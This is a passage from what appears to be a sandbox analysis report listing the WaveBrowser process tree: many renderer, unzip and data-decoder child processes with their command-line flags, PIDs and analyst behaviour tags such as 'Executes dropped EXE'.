          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4676,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2332 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:6028
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4560,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4612 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5636
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4596,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4872 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5272
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4672,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4600 /prefetch:1
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5268
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4508,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5000 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:3712
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4492,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5164 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:1644
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4696,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5316 /prefetch:1
          - Executes dropped EXE
          - Loads dropped DLL
          PID:3648
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4692,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5432 /prefetch:1
          - Executes dropped EXE
          - Loads dropped DLL
          PID:3480
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4700,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5596 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:620
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4724,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5768 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          PID:4772
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4728,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6044 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:4132
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6364,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6400 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5160
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6524,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6540 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:3644
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6684,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6744 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5844
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6344 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:1608
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6676,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6688 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          PID:5540
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=7216,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7232 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          PID:6056
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4088,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6572 /prefetch:8
          - Executes dropped EXE
          PID:6276
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4072,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5004 /prefetch:8
          - Executes dropped EXE
          PID:6364
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5724 /prefetch:8
          - Executes dropped EXE
          PID:6384
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7520,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6544 /prefetch:8
          - Executes dropped EXE
          PID:6508
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6420,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7644 /prefetch:8
          - Executes dropped EXE
          PID:6668
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6484,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7664 /prefetch:8
          - Executes dropped EXE
          PID:6700
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6672,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7812 /prefetch:8
          - Executes dropped EXE
          PID:6820
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7968,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7980 /prefetch:8
          PID:6876
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8104,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7948 /prefetch:8
          PID:6936
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8108,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8264 /prefetch:8
          PID:7052
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8096,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8408 /prefetch:8
          PID:7112
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5704,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5596 /prefetch:8
          PID:6296
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5840,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5552 /prefetch:8
          PID:6336
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7656,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5000 /prefetch:8
          PID:6692
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6600,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6368 /prefetch:8
          PID:6724
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6592,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8380 /prefetch:8
          PID:6712
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6408,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8064 /prefetch:85⤵PID:6776
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6616 /prefetch:85⤵PID:7012
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7892,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7928 /prefetch:85⤵PID:7024
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7876,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7628 /prefetch:85⤵PID:7064
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7576 /prefetch:85⤵PID:7132
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7580,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7544 /prefetch:85⤵PID:7056
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3572,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5724 /prefetch:85⤵PID:6268
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6360,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4616 /prefetch:85⤵PID:6220
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6292,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4772 /prefetch:85⤵PID:6280
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7212,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5756 /prefetch:85⤵PID:6480
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8520,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5560 /prefetch:85⤵PID:6008
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8628,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8504 /prefetch:85⤵PID:6492
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8392,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5588 /prefetch:85⤵PID:3612
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5748,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8832 /prefetch:85⤵PID:6460
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8856,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8904 /prefetch:85⤵PID:6392
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5856 /prefetch:85⤵PID:6196
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9176,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9188 /prefetch:85⤵PID:6204
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9168,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8892 /prefetch:85⤵PID:6940
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9360,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9372 /prefetch:85⤵PID:6112
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9172,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9520 /prefetch:85⤵PID:6580
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9232,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9544 /prefetch:85⤵PID:6000
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9512,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9180 /prefetch:85⤵PID:5272
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9952,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9964 /prefetch:85⤵PID:6948
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10108 /prefetch:85⤵PID:6320
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9828,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10252 /prefetch:85⤵PID:6444
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9956,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7704 /prefetch:85⤵PID:5736
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7760,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6072 /prefetch:85⤵PID:6912
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7708,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10432 /prefetch:85⤵PID:6736
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7668,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10728 /prefetch:85⤵PID:6212
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10876,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10924 /prefetch:85⤵PID:7824
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11064 /prefetch:85⤵PID:7836
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10736,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11208 /prefetch:85⤵PID:7848
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11344,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11240 /prefetch:85⤵PID:7892
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7776,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11492 /prefetch:85⤵PID:7924
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10888,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11636 /prefetch:85⤵PID:8056
-
-
